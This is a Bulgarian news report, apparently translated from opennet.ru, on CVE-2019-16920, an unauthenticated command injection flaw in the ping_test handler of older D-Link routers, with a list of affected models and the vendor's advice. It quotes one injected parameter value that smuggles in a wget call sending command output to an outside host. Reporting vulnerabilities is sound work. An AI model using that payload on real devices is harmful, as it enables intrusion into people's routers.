Дистанционно използваема уязвимост в рутерите на D-Link

В безжичните рутери на D-Link идентифицирани опасна уязвимост (CVE-2019–16920), което ви позволява дистанционно да изпълнявате код от страната на устройството, като изпращате специална заявка до манипулатора „ping_test“, достъпен без удостоверяване.

Интересното е, че според разработчиците на фърмуера извикването „ping_test“ трябва да се изпълни само след удостоверяване, но в действителност се извиква във всеки случай, независимо от влизането в уеб интерфейса. По-специално, при достъп до скрипта apply_sec.cgi и предаване на параметъра „action=ping_test“, скриптът пренасочва към страницата за удостоверяване, но в същото време изпълнява действието, свързано с ping_test. За изпълнение на кода е използвана друга уязвимост в самия ping_test, която извиква помощната програма ping, без правилно да проверява коректността на IP адреса, изпратен за тестване. Например, за да извикате помощната програма wget и да прехвърлите резултатите от командата „echo 1234“ към външен хост, просто посочете параметъра „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$(ехо 1234)".

Дистанционно използваема уязвимост в рутерите на D-Link

Наличието на уязвимостта е официално потвърдено в следните модели:

  • DIR-655 с фърмуер 3.02b05 или по-стар;
  • DIR-866L с фърмуер 1.03b04 или по-стар;
  • DIR-1565 с фърмуер 1.01 или по-стар;
  • DIR-652 (не е предоставена информация за проблемни версии на фърмуера)

Периодът на поддръжка за тези модели вече е изтекъл, така че D-Link Той заяви,, който няма да пуска актуализации за тях, за да елиминира уязвимостта, не препоръчва използването им и съветва замяната им с нови устройства. Като заобиколно решение за сигурност можете да ограничите достъпа до уеб интерфейса само до надеждни IP адреси.

По-късно беше открито, че уязвимостта също е била засяга модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, плановете за пускане на актуализации за които все още не са известни.

Източник: opennet.ru

Добавяне на нов коментар